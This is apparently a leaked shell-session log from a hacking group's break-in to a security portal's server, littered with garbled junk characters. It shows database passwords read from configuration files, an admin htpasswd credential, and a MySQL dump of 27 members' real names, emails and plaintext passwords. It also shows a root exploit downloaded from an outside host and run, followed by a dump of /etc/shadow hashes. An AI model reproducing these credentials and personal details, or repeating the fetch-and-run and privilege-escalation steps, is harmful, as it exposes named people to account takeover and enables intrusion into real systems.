$ s' F# a8 Q& e# F+ R; h# }drwxr-xr-x 7 astanet astanet 4096 Dec 22 14:16 链接标记astanet@astalavista.com
6 V4 H" F2 \. o, hdrwxrwxrwx 2 astanet astanet 4096 Jan 5 2006 backend7 b# ~2 E& k) Z3 G+ ? M( c
drwxr-xr-x 2 astanet astanet 4096 Oct 24 2006 banner
. h( g' x, u: X6 n. Q- I+ V$ D8 [-rw-r–r– 1 astanet astanet 25724 Apr 4 2006 banner.jpg6 l+ g2 Y! ]+ C9 W3 n4 e* y
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 config
7 \8 i" ^. w, l( n+ Cdrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 cron
3 ^. A+ P! ^/ s- b: Ddrwxr-xr-x 11 astanet astanet 4096 Jan 5 2006 dvd- S4 D5 `! @% F6 }9 ]
-rw-r–r– 1 astanet astanet 36 Jan 5 2006 error.php& }8 J- ^; P/ r% r& O4 I' M7 u
-rw-r–r– 1 astanet astanet 1406 Jan 5 2006 favicon.ico& j/ U+ p3 D) E, ?) A7 n
drwxrwxrwx 2 astanet astanet 4096 Dec 15 2006 feed4 X/ o1 e8 I4 `
drwxr-xr-x 3 astanet astanet 4096 Dec 8 2006 flashtour; r4 k9 q+ x: D0 n6 ^, z
-rw-r–r– 1 astanet astanet 18 Jan 5 2006 htaccess
' F) w! {, u0 J$ ?. K k' O' `5 P% F, @-rw-r–r– 1 astanet astanet 585 Mar 24 14:50 .htaccess6 k3 B t+ u& L- Y
-rw-r–r– 1 astanet astanet 398 Jan 5 2006 index1.php4 Y( z! |, R' @* X/ b+ j
-rw-r–r– 1 astanet astanet 1036 Jan 5 2006 _index.html
. E% z0 W9 d/ m9 l-rw-r–r– 1 astanet astanet 6880 Dec 23 14:44 index.php
. V" ]. C7 w3 {: W: c-rw-r–r– 1 astanet astanet 676 Mar 21 2006 index_redirect.php4 Z+ `! @0 t5 O/ \# A7 P, ^4 w1 A
-rw-r–r– 1 astanet astanet 739 Feb 24 2006 index.swf
. h" `" l! I5 k) O1 }7 }drwxr-xr-x 4 astanet astanet 4096 Oct 18 2006 irc; N9 c# S9 @6 [
drwxr-xr-x 4 astanet astanet 4096 Aug 11 2006 lang$ Z* q+ H9 E' c2 O* F
drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 lib+ B' ]' I5 J5 y/ E1 F
drwxr-xr-x 6 astanet astanet 4096 Aug 11 2006 log# ?0 w ], x+ B9 ]/ m/ @) v! F
drwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 member
/ x/ l$ _) z8 U2 L! q/ wdrwxrwxrwx 5 astanet astanet 4096 Jun 4 00:03 memberdata
5 U, U; g! p5 T& N3 X4 o1 Kdrwxr-xr-x 2 astanet astanet 4096 Jan 5 2006 new/ C# r; k- v+ o" g2 S
-rw-r–r– 1 astanet astanet 7219 Feb 24 2006 pix1.swf
- a# x# V, A, A0 W4 Tdrwxr-xr-x 2 astanet astanet 4096 Oct 27 2006 re. d' j( S2 z4 g5 J4 K
-rw-r–r– 1 astanet astanet 23 Jan 5 2006 robots.txt# o y1 {2 ^2 A4 p8 l0 M4 h/ F
drwxr-xr-x 3 astanet astanet 4096 Aug 11 2006 rss- q9 v% ? J/ A3 H
drwxr-xr-x 39 astanet astanet 4096 Dec 13 2007 sources
5 n" u" s0 a! udrwxrwxrwx 3 astanet astanet 4096 Feb 2 15:40 temp_com' u0 i% }% V& b# ?- q; M) w6 i0 k
drwxr-xr-x 7 astanet astanet 4096 Aug 11 2006 themes
- @( Q) I' n" R8 y- sdrwxr-xr-x 2 astanet astanet 4096 Mar 14 2008 tmp_src/ D% M7 g( }/ F9 k
drwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 tpl! N0 x; T' J/ z% W0 W$ p
drwxr-xr-x 3 astanet astanet 4096 Sep 7 2006 v2
' q; J, u& P0 k3 C, s& odrwxr-xr-x 16 astanet astanet 4096 Jul 5 2006 v2_old
1 P; T! {: R$ t& M2 N0 w5 E6 D5 z-rw-r–r– 1 astanet astanet 35 Dec 4 2006 webcash.php
$ T7 U) Q: U4 [) F: f/ m# `drwxr-xr-x 13 astanet astanet 4096 Sep 21 2006 wiki5 @& }+ u) p3 D; T+ }$ ]. U
V! F% Z) y3 r5 L
sh-3.2$ head -20 index.php1 x( Q, b E% |1 V" R( \
<?PHP8 m* d1 b1 q; a8 h8 a
/**
; u; d J1 h2 e/ E* i* Mainfile (external) for astalavistaNET v2.0; @) Q ?- |! J$ Q! c
*
& U- j' r4 v h) }3 j- i9 r/ P6 p* @copyright Astalavista IT Engineering GmbH
: H3 [( B; ]* O* @author Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
1 P' D& g% x0 P& u* @version 1.0
6 b. N2 ?, T4 p3 g3 G*/5 N: a9 V1 E, h2 Q' ]
* v9 q2 o Q! w+ O# }3 { if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {1 `: I& i7 D$ J
$dontStartSession = false;! C" I; c' x" g4 {! u& C
} else {+ o2 V6 }# ~) V! C0 @" D
$dontStartSession = true;
. `- M) e D+ M% b) R8 m. E }
9 D; R% \: @* x! M+ _ require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);- V" B" h: u. `1 c# s* h
require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);
# P/ Y. e* x% B" E% j require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);- t$ X2 l* \' B+ ^1 Q) d& ?! d
require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);, h* `% j$ s/ c+ U9 q. D$ k9 `
+ r( D! ~/ z5 G) f; C* K- x" E
sh-3.2$ cd config
3 ~7 R$ p% V, ssh-3.2$ ls -la
8 U; J8 h% N, u" e" j9 }* Rtotal 32 @0 V( e$ } z3 q6 l
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 .
& ]- c, B4 p! L1 A7 `! E& Cdrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
0 J4 ^$ [0 P* J/ W n3 J8 L-rw-r–r– 1 astanet astanet 987 Aug 11 2006 adm.conf.php P& M& _) o/ h& ]% Z- f- K. {+ g
-rw-r–r– 1 astanet astanet 4937 Dec 23 15:48 com.conf.php/ {& D* O5 ^- r5 s7 r" G
-rw-r–r– 1 astanet astanet 913 Aug 11 2006 cron.conf.php
5 }3 a: |8 C- N0 h, z9 {-rw-r–r– 1 astanet astanet 1668 Aug 20 2008 ext.conf.php9 v6 G- m. D* R
-rw-r–r– 1 astanet astanet 2724 May 30 2007 int.conf.php' {7 {) `% X2 k+ i X
: u( i y+ k% e; n
sh-3.2$ cat com.conf.php
; a3 G b, u! I F! P[snip]
- ~9 `9 k& d+ k8 U//member-database0 ? Z/ h, I* v2 o; }$ }" o
$_CONFIG['db_mem_server'] = ‘localhost’; u, q n- L: o3 J' Y" Q/ B/ {, V- @% d
$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;8 Y% Z! k% m4 u4 ~6 Q1 Y
$_CONFIG['db_mem_user'] = ‘astanet_db’;
9 Z9 x$ H @+ U5 X+ n& G! m$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;
/ J5 W8 p1 Q4 b! F$_CONFIG['db_mem_debug'] = false; //true or false
" J$ t& x8 a( Y$ s( Y M# O8 J; h//ads-database2 \& `, P: d5 j$ J& c6 o
$_CONFIG['db_ads_server'] = ‘localhost’;
' C/ M6 D$ ? \ _. A$_CONFIG['db_ads_database'] = ‘astanet_ads’;
3 e1 ]" D# V$ I/ @$ ]/ I) v+ @3 T$_CONFIG['db_ads_user'] = ‘astanet_db’;( ?: X6 C& t+ n
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;& y% `6 V; }$ h8 M, C1 w
$_CONFIG['db_ads_debug'] = false; //true or false
+ Y/ V8 k7 K& N/ \//rainbow-database, {. ]0 F! j+ z: a* E; ~' E
$_CONFIG['db_rainbow_server'] = ‘212.254.194.163′;
6 D h$ m: a H+ H$ y% n$_CONFIG['db_rainbow_database'] = ‘rainbow’;
: @: m, ~, L) E, J9 b. c4 Q2 E$_CONFIG['db_rainbow_user'] = ‘dinu’;' M ]5 n; U" W" C3 I5 A
$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
7 J+ P) u- C9 C% B$_CONFIG['db_rainbow_debug'] = false; //true or false1 n: {4 j0 [% E3 E
//mailing lists database2 C) U- {. R' E8 X% [. u) i' X
$_CONFIG['db_mailing_lists_server'] = ‘localhost’;# y' t% a2 p9 e6 P' f3 k
$_CONFIG['db_mailing_lists_database'] = ‘astanet_mailing_lists’;
( D3 C. @6 Y( ]* [4 ^' y& k3 T$_CONFIG['db_mailing_lists_user'] = ‘astanet_db’;) U/ B( u# p3 S+ Y. J5 B
$_CONFIG['db_mailing_lists_password'] = ‘TXwVrC7hbq’;( W4 l1 T* O) A S. M2 C
$_CONFIG['db_mailing_lists_debug'] = false; //true or false7 J- [, O2 ~1 m
//paypal
/ @( r: @- D9 g) g/ `# ~$_CONFIG['sub_pp_url'] = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;
" T- Y7 a3 F$ R( K$_CONFIG['sub_pp_cmd'] = ‘_xclick’;) D. F- i; ~3 n; F
$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;" n. v0 k8 o3 d8 b, z1 ^7 p
$_CONFIG['sub_pp_noship'] = ‘1′;' A+ R5 e6 D) N
$_CONFIG['sub_pp_referer'] = ‘链接标记[url]https://www.paypal.com/[/url]’;* F; G2 _6 z- l0 S
[snip]
! M2 m, b, E ?% @$ P) T* B) N9 e* B5 J' }+ ]# H
sh-3.2$ cd ..$ z3 S. p# N& p! r
sh-3.2$ cd member8 p' ^( I' g, L: L+ H& {- S2 p3 R
sh-3.2$ ls -la, o0 j) H- H, e! M1 z. }( i0 N
total 20
7 r. d" t& Y% U- ~5 J! }1 ydrwxr-xr-x 2 astanet astanet 4096 Jan 13 14:02 .
% \3 y6 l* M8 z* q( G2 ddrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..$ n+ b9 n& m, ~" P; A3 ] u
-rw-r–r– 1 astanet astanet 19 Jan 13 14:02 .htaccess
1 d* e1 ?6 `' x-rwxr-xr-x 1 astanet astanet 6709 Jan 13 14:06 index.php! Y7 u! r, ?1 V! ~1 h$ a
sh-3.2$ cat .htaccess) l& `2 y% X' R/ p* @" y; l
SecFilterEngine off
, U6 ]/ W2 r. A$ K1 i5 d
9 H& X, f$ v0 N. S* L: h6 Ssh-3.2$ cd ..
& p, t! T# V! Vsh-3.2$ cd cron
- N6 J$ |+ u) S" b# Y3 xsh-3.2$ ls -la& ?; e6 V" N6 M; k# _+ T
total 168
( }- _8 K) M% u6 _; x& N0 Ydrwxr-xr-x 3 astanet astanet 4096 Jan 12 08:52 .
' ^# f: h, g, s7 p8 Odrwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
1 N9 }; L0 L2 [ |+ ~! m' X-rw-r–r– 1 astanet astanet 1272 Jan 12 08:24 0_corefile.php
) h h4 } J. `6 g. D8 f. M2 X-rw-r–r– 1 astanet astanet 2356 Aug 11 2006 0_functions.php
( [3 [1 P+ }, E! j-rw-r–r– 1 astanet astanet 3616 Dec 23 15:44 1_daily.php9 ^9 ^+ e4 Q5 t. |" a
-rw-r–r– 1 astanet astanet 527 Aug 11 2006 1_fivemin.php' e9 {% y4 }2 w: g4 ~
-rw-r–r– 1 astanet astanet 5006 Dec 23 15:39 1_hourly.php
, W' A% h3 \+ m* {0 ]-rw-r–r– 1 astanet astanet 432 Aug 11 2006 1_weekly.php
$ ]# Y8 c9 t: ^; h/ D3 T( ?, f-rw-r–r– 1 astanet astanet 2277 Aug 11 2006 2_advertising.php
" s8 S% M8 K0 N+ ]! e# d-rw-r–r– 1 astanet astanet 4882 Dec 23 15:40 2_archives.php2 [' W3 Z( u" j
-rw-r–r– 1 astanet astanet 3784 Aug 16 2006 2_awstats.sh$ Z" t, L. }7 b( y. d
-rw-r–r– 1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php' d4 @5 r( r: U, ~" h; o
-rw-r–r– 1 astanet astanet 14979 Jan 12 09:10 2_expire.php
5 M w8 Z5 {% g, w* c$ y8 O, a, m-rw-r–r– 1 astanet astanet 7657 Aug 15 2006 2_exploitree_updater.php
' q! G, X- M: |. G5 W* h ^3 ]-rw-r–r– 1 astanet astanet 686 Dec 23 16:31 2_filesize.sh
+ B+ ~- b5 f7 \-rw-r–r– 1 astanet astanet 9853 Aug 11 2006 2_keywords_old.php
, `0 q: y1 x4 B/ t9 r-rw-r–r– 1 astanet astanet 15664 Sep 22 2006 2_keywords.php' ?3 ]' [6 L( `2 ]7 z
-rw-r–r– 1 astanet astanet 1233 Aug 11 2006 2_proxy_checker.php# s- X1 ]2 g1 m* ~
-rw-r–r– 1 astanet astanet 7558 Aug 11 2006 2_proxy_collector.php- K# c2 y& y: [. B- C
-rw-r–r– 1 astanet astanet 796 Aug 11 2006 99_create_emails.php5 u1 L& I: ]& [( h0 G3 @$ d
drwxr-xr-x 2 astanet astanet 4096 Aug 11 2006 99_lang_email9 m( d6 w# y& d' H# C# o
-rw-r–r– 1 astanet astanet 9622 Jan 6 16:04 login_reminder.php
9 V: B H8 a P0 k6 [, p-rw-r–r– 1 astanet astanet 9620 Jan 6 16:05 login_reminder_test.php' Q: O; T8 S# [0 q6 u
7 ?4 d- y3 Z! d) F, U* i4 }1 M
sh-3.2$ cd ..
: R" Y7 u$ X$ l+ q! `sh-3.2$ cd _007
) n5 M6 Z9 e( tsh-3.2$ ls -la% }6 y( @1 ^) D* @5 a3 {+ {& v
total 24
( n+ r0 X" z! m: U! Z- j/ U; u: u5 `( fdrwxr-xr-x 3 astanet astanet 4096 Dec 27 2006 .$ a# K. B# q# S3 {0 s% W2 N
drwxr-x— 29 astanet apache 4096 Jan 6 13:58 ..
+ |( E7 Z4 N: q0 d e0 b q" ^8 a-rw-r–r– 1 astanet astanet 96 Dec 23 15:17 .htaccess# L0 _7 m! Y( V6 ?* N4 G
-rw-r–r– 1 astanet astanet 3263 Jan 15 2007 index.php
9 G, }) A1 g6 V+ E2 _/ W-rw-r–r– 1 astanet astanet 20 Dec 27 2006 info.php
' ?, @: _. F7 L) B9 V& E3 r" Xdrwxr-xr-x 5 astanet astanet 4096 Aug 11 2006 sitemap/ ^/ [$ m" j) w6 q3 O: k
' B& T1 H7 y! D9 `2 N- X, c- `sh-3.2$ cat .htaccess( ?6 B0 Y/ U# u+ X' ~2 Y3 w0 i1 A& \
authType Basic% q! H/ w' F! N9 a$ j
authName Admin6 { F8 [; {- v
authUserFile /home/astanet/auth/.htadm_pwd% ~; `5 w3 e" [( ?2 ~- i; U5 M
require valid-user& L1 [! E& } f. q6 r4 j
4 y# [5 z5 r8 n3 f. w4 A' `$ f
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
Y) c9 j" i% k# d" C& @admin2net:CR0bl65MwhfT
' R% q- `4 R7 n/ V
: O; U( C* `: B, fsh-3.2$ mysql -u astanet_db -p, p- q' ?( k; p: O! v
Enter password:4 \+ J: k8 o& y
Welcome to the MySQL monitor. Commands end with ; or \g. o! V. s- o* I; W5 Q0 B* z& \
Your MySQL connection id is 275153
' c! L8 B$ {) sServer version: 5.0.45-community-log MySQL Community Edition (GPL)
+ {: T: j' x8 o! l* d
! h" [% f6 b7 O q& S) VType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
0 [7 ?: U; E1 n$ x5 ~/ }2 _3 D& }
: k6 z0 O* N6 w D- q# f# l. M! {3 qmysql> show databases;- D# l8 v( i5 I4 O" v% s- J
+———————–+
x8 E: Y6 r' Q+ u7 O| Database |5 w5 }& ^. I+ T# E. R$ _
+———————–+
$ }9 _0 R% D+ P9 [1 u| information_schema |, c1 j; e4 b/ G2 e3 n# W" v p
| astanet_ads |+ u7 W E( w- C
| astanet_mailing_lists |
6 k5 h- m6 X2 Z- k* e| astanet_mediawiki |2 L" {1 n" d. ~5 @
| astanet_membersystem |1 G5 t" X7 S* [: a7 j) q/ ~
| test |1 t! u5 h7 Q8 L
+———————–+
) m6 c; p6 p: A; b% C$ i/ F2 J6 rows in set (0.00 sec)
7 s/ g4 J& Z% ]- c9 N; a8 f
& w! Q- P* A6 o c8 p, Nmysql> use astanet_membersystem
' {& O$ p0 J7 [% d) E7 eDatabase changed* v( ?& M; o- l/ t
mysql> show tables;
2 a2 V9 W# t7 @9 f5 W+———————————–+
4 H" K1 R5 @+ M+ f$ H| Tables_in_astanet_membersystem |6 `9 K' |9 U0 b4 d7 h( A( C* X$ n' `
+———————————–+( I- a& r3 l! ?- @2 ~
| blacklist_categories |
8 q9 I% j% |3 U| blacklist_content |' a" ~2 T2 d# ^, p# Q0 I- J& E' e$ @
| blacklist_levels |
0 P, r& \1 Z9 c4 l7 z: J {| blacklist_mcset |
0 E" y8 h+ W* O1 b6 E| dir_categories |2 x* b1 v# L2 g4 w1 O6 s* M3 Z
| dir_comments |5 O" l0 k1 R8 C0 g# z% N! @
| dir_links |
) `3 [! N4 r7 l2 I$ M| dir_temp |6 L J& \2 L. z' W! x5 }: A6 z5 s
| dir_votes |0 u/ |/ P# v O$ h3 I9 a2 F
| documents |- }9 Z+ ~! J% P+ }
| documents_categories |; T, u- I( H, q$ z1 {
| email_content |- \. `: `- C* {
| email_settings |
; D# r* _- m8 I6 t. y9 O& \| exploits |
9 S, J6 M5 ^+ y, ~' T7 T$ B| exploits_categories |
% M) g6 b& I" s! F5 ]| exploittree_categories |# h: y9 f+ g) h7 d
| exploittree_exploits |, n, l% }0 t1 d5 Z
| home_values |
% {. z9 N% [% T, S) n8 d3 i2 q. Q| iso_countries |
* M8 L3 S7 F) Q; V5 T u7 y Z| links_categories |) M! h ~) k; j* D+ N
| links_records |
7 G# s ?7 S! Q! o/ J' J6 P| links_unauth |
; Y, Y6 L, T0 z- P s| links_votes |1 w; a) {2 u2 M0 q0 C, L
| log |
6 @0 Q+ R! b! [7 m* f# X% N- w| news_categories |% Z' I, Y, U- ~+ g3 b) t
| news_comments |7 i# r- i" Q9 a5 ]
| news_emoticons |( K+ N" N* v6 P* s
| news_latest |
# k, ~# o3 {3 l& L| news_messages |
4 e/ s& {2 e' G- }| news_statistics |3 \3 K2 R7 g4 n; y, J3 @+ g( r1 Q
| news_votes |
" h1 a F1 U8 s8 M| prices_content |) I) q8 X% W8 d' u& Z# H
| prices_offers |
' k, V9 V' u5 e, F8 h, A4 {| rss_settings |
9 \' x$ e$ x: g8 x! N| sessions |
% V- T( @2 ]% X| stats_signups |8 L# `# T8 Q& ~1 m# c
| u2u2 |
8 c9 y- g, I9 \4 N| u2u_contact |$ l# o; y {( ?7 X
| u2u_settings |- a6 e% B9 K, w+ A4 n
| user_keywords_selected_categories |9 g8 ?* y2 x& v
| users |; ? o3 g8 s+ B4 S% O
| users_ipn_test |
6 V2 f; p' j& Q! G| users_keyword_values |0 Y2 E- {0 q9 n7 D
| users_profile |
. q: @) V8 L. e0 _| users_temp |
3 W2 a f) B+ s5 |, D) s# d/ ]! r| users_upgrade |
+ {+ P2 y6 N% a5 q+———————————–+
) n! p8 U7 w, Y4 d& `46 rows in set (0.00 sec)4 v4 @+ y; k+ B" O
& q% X6 K& [* ^mysql> describe users;
; `1 m: K+ q y I+————————–+————————————–+——+—–+———————+—————-+
. T+ L2 v- i6 z. v" t% N8 ~| Field | Type | Null | Key | Default | Extra |
9 w1 L4 e4 ?0 Z! c# R5 l( s& z+————————–+————————————–+——+—–+———————+—————-+* V8 u1 N& N) e
| primary_key | smallint(5) unsigned | NO | PRI | NULL | auto_increment |
6 U* p2 `7 X( b. T& o! p" h; B| user | varchar(50) | NO | | | |
" d# o" \! b& Y2 o| nickname | varchar(30) | NO | MUL | anonymous | |
/ r! R6 u! H3 h) \6 t' G| password | varchar(30) | NO | | | |. q# v- i8 c6 M) d
| userlevel | tinyint(3) | YES | MUL | NULL | |
$ a3 b9 s0 P: o| exp | int(8) unsigned | NO | | 0 | |; R2 H. l5 J. T- s
| email | varchar(50) | NO | | | |$ h1 d2 y- u/ S6 W0 ~& a0 |
| ip | varchar(15) | NO | | 0 | |' v& y# k! X) A: L) E+ p: T. e
| proxy | set(’0′,’1′) | NO | | 0 | |
$ Z2 i3 c; B+ R$ x# s* D| logtime | timestamp | NO | | CURRENT_TIMESTAMP | |
9 }3 F* s" ~8 b4 l3 [8 y, O| login_reminder_last_sent | timestamp | NO | | 0000-00-00 00:00:00 | |; @5 }; p2 a# W5 M
| anz_in | tinyint(1) | NO | | -1 | |/ p* j, H {9 `
| status | tinyint(1) unsigned | NO | | 0 | |4 S+ m/ _, O' u6 a( i0 P. h) u3 `4 _
| checked | set(’0′,’1′,’2′) | NO | | 0 | |2 `9 O9 N* ~$ j. ~5 T7 b0 D5 v
| freemember | set(’0′,’1′) | NO | | 0 | |+ Y9 ]9 j4 o1 K& k( W) O4 `( m1 A
| ordertype | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES | | NULL | |
R: c" k" h4 m+ h1 f+ o1 q| lang | tinytext | NO | | | |
+ C/ y8 v9 p) X8 X| adid | smallint(6) | NO | | 0 | |
0 J# j+ M; N0 n1 _6 K| pp_txn_id | varchar(255) | YES | | NULL | |0 d0 R- U/ M3 u8 t1 w V% }
| cnb_transaction_id | varchar(255) | YES | | NULL | |5 o1 D) R0 K% F$ Z) {( Y
| cnb_order_id | varchar(255) | YES | | NULL | |
: U7 A& _) G: M1 x7 k| cnb_user_id | int(11) | YES | | 0 | |
8 Q, a: C* w2 ]3 i z! G/ G+————————–+————————————–+——+—–+———————+—————-+9 s; z- K0 |+ R9 ]+ Y
22 rows in set (0.01 sec). B+ K! L- z) {6 r: Y1 _& j' Y
( c7 R4 A& W" u5 o; ^6 ?1 o% a
mysql> select count(*) as skids from users;
: N6 o& S: K! U& U& ~' _" `+——-+0 [; s' o+ W* V2 w2 X
| skids |
- A# P1 f0 \* Q5 X/ n/ d+——-+( b7 L( u% g4 D/ L; @' f7 X8 ]6 p9 ?. L
| 25199 |$ @) u) U6 {. N& k: C
+——-+! n) S# T( \: t3 D7 w
1 row in set (0.00 sec)
/ h% P$ b8 A1 f: m/ v% B" D; A. S! z' E
mysql> select user,nickname,password,email from users where userlevel = 1;
9 Z! m9 |- R) X* {+————————–+———————-+——————+———————————–+ _4 Q" o7 V7 k2 I" L' I; f
| user | nickname | password | email |
5 l v/ M/ \/ J. N- L# l+————————–+———————-+——————+———————————–+
; l# j1 c+ o- U| pascal | prozac | astaman3 | 链接标记info@astalavista.net |
! s3 F/ {9 [4 e" t| Ivan Schmid | rOOtless1 | astalavista4asta | 链接标记ivan.schmid@comvation.com |* j4 n/ I* w7 u4 t9 u
| qreymer | Palermo | qblsw85iam | 链接标记eche@home.se |
; i' M2 ]9 j. S, y6 Y2 t3 K& {& h| Christian Wehrli | g0atherd | hitt?74 | 链接标记g0atherd@gmx.net |$ @: G5 B0 V" X) B8 B* _
| Andrew Blake | Minky | liq73uid | 链接标记a.blake@har.mrc.ac.uk |
! H3 C" ~ O4 B| Martin Wyss | dinu | kj63;cXy | 链接标记martin.wyss@astalavista.net |
M# o6 c" r, g- C| Leandro Nery | Timan_no_Sanco | nery2002 | 链接标记leandronery@hotmail.com |
: ?- P. W9 `* j| shaving ryans privates | ShavingRyansPrivates | memberboard313 | 链接标记shavingryansprivates1@hotmail.com |
P( p5 a( Q ^$ `| Gerben van der Lubbe | Spoofed Existence | Lb59eXg5 | 链接标记spoofedexistence@hotmail.com |
" T( T' R* t1 P3 m3 t* U: D0 ~' s| David M Lee | Daremo | icG12m03 | 链接标记daremo@hackerheaven.com |: V) Z% z/ n0 V9 n# k6 H& Y f4 u
| David Corn | akriel | ve3uB$cUku | 链接标记akriel@fallenroot.net |. m5 {9 C- f; E* d2 J" z
| Thomas Kalin | Gwanun | QwErTy123 | 链接标记thomas.kaelin@astalavista.net |
7 q8 I( p, w) s| Marcus unknown | Cra58cker | hhCr4ck06 | 链接标记unknownmarcus@hotmail.com |& D- D. ~ o! s% E0 @( z
| David Ellis | dellis203 | philip | 链接标记dellis@nightwatchnss.com |
" q( t& e2 t+ [8 l| Lars Christian Solberg | xeor | tF3s4|Nea | 链接标记xeor@hush.com |
M" f5 Y2 u& [5 O9 r' C" J; C| Paulo Santos | Be1er0ph0r1 | amor01 | 链接标记pmsantos@gmx.ch |
- H: t! S; u3 m1 _7 L| Thomas D?ppen | daha | asta4tom | 链接标记thomas.daeppen@astalavista.ch |
- {3 C- v' v# J3 c) b# s| Touraj Abbasi Moghaddasi | -Crow1 | NetR0ck | 链接标记toraj.a.m@gmail.com |
" |4 G2 R. y3 y o* {5 \ N| Fabius Bernet | traviser | wellenreiter100 | 链接标记fabius.bernet@astalavista.ch |
8 @; Y6 D, n4 Q( I3 Q9 {* `4 \5 l| Zachary McElroy | duder1 | dirty245dix | 链接标记mcelroyzj@yahoo.com |. @* d" t+ X( @0 Q/ i
| Leron Cohen | cohen2 | leron4free | 链接标记leron@quiredmedia.com |$ o0 ?/ e6 I" W, |
| Beatriz Pontes | anonymous1656 | pitas | 链接标记joao.pedro.pontes@gmail.com |% j8 G( F2 ^) |
| Glafkos Charalambous | anonymous2086 | si99490178$# | 链接标记nowayout@webhostline.com |
8 E6 j/ q" a5 O| developer COMVATION | anonymous2402 | Ri?Q$Q$MVU | 链接标记ivan.schmid@astalavista.ch |+ C% U i. u% i( C) i, r
| Peter Fisher | cyph3r1 | testZer025435 | 链接标记cyph3r@astalavista.com |; e; G9 r/ V+ x& `8 z% |
| sykadul | sykadul | ak29eral | 链接标记sykadul@gmail.com |
% p3 z5 w' I- s W| Ronny Janzi | commander1 | mpbdaagf6m | 链接标记ronny.janzi@astalavista.ch |# a, o5 t* D) ?, M7 z& e
+————————–+———————-+——————+———————————–+3 N$ e" T- Y* Y
27 rows in set (0.00 sec)
. u/ M, [/ A8 ?" ^5 f
5 O4 _ }1 E1 a# g- q0 D2 nmysql> exit;
3 f) g( [4 b2 {( N+ b9 B% DBye( w6 x5 l- d. ^3 L* Y
1 Z6 H2 Y) p6 N7 E! C& ^[~] plaintext passwords? yes,
; ]3 l: a+ Z; ~( U% `, sThose so called “security professionals” who charge you $6.66 / month to3 M% T5 M6 b- p% i
register at their hack-proof portal, save your passwords in plaintext…: |; x9 F$ J. s U# e/ u
brilliant!- k3 W- V/ j: Z+ U
4 o1 l! i2 ]! B) A
[~] This been fun but we want more.5 w% L Z0 n, f) J% r$ Z
# ]4 }3 N$ C9 r! y0 Ksh-3.2$ uname -a
4 N5 X! a0 T7 X) G6 ILinux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux, r5 O0 u8 S" Y- a$ A; Q
sh-3.2$ wget 链接标记[url]http://anti.sec.labs/g0troot[/url]+ m7 Y) f; ]" d
–13:33:37– 链接标记[url]http://anti.sec.labs/g0troot[/url]
2 l0 U4 S. i1 B1 @6 }, {0 \Resolving anti.sec.labs… 13.33.33.370 p/ b9 D$ ~, U) B' y, w
Connecting to anti.sec.labs|13.33.33.37|:80… connected.( o( `- w% F5 }0 Z3 C) N
HTTP request sent, awaiting response… 200 OK5 q' c$ K! R, O, H
Length: 18200 (18K) [text/plain]
1 [3 K/ C) d0 j: U6 VSaving to: `g0troot’
4 s }6 d* S' s+ O1 I# P- b: S% k
# Z6 Y# H' O" p/ [6 W6 n# p2 Q( H8 S100%[=========================================================================================================================================>] 18,200 58.6K/s in. L0 e) r/ Z# O8 @& h/ G
0.3s
* j! u9 a0 W5 A Z- p" t' [" Z. ^& g' ~
18:55:14 (58.6 KB/s) - `g0troot’ saved [18200/18200], g9 I7 g7 t# d6 B7 N
& l5 b( ?0 T; J" J4 csh-3.2$ ./g0troot -i x86_646 \4 @1 e+ V& A
[+] g0troot - anti.sec.labs% N8 G8 c/ c, y% |! X* ^7 k( o
[+] Target: 2.6.18-128.1.10.el5/ {# a& F8 K O' m, q
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]! e" s5 K8 H8 z
* z1 w9 h9 N7 z5 P) \; E
[+] r00tr00t
) b* l+ y2 a" } @% j[~] Executing shell…
/ o7 n7 ?0 j3 r% F
' l0 }. u) D. @: O: z$ U: Msh-3.2# id. x! ?, Q! A7 J$ j7 Q
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)8 R! g W1 F' @! u b4 x
' r7 I5 p, Y: _; Z/ Q) W! l# n
sh-3.2# cat /etc/shadow2 @5 y, }+ ^" h
root1$P/3ZMAgv$E9B4mX02s1Xrimj46V602.:14015:0:99999:7:::8 |1 W {1 v2 k6 S: s
[snip]9 H. Q/ X: ?& e6 i2 n. r5 O+ \' b: x
admin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
- K _/ H- I# Mjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::
B9 A. j9 G4 x8 s% [8 F) \com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::$ _1 g1 _6 ^+ \
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
! O1 Y4 q" g0 \3 f# j7 l3 Z
4 v: W' {# v0 R2 v5 }- j& psh-3.2# cat /etc/motd
+ t! N6 N& [$ n% H' t3 ~#####################################################
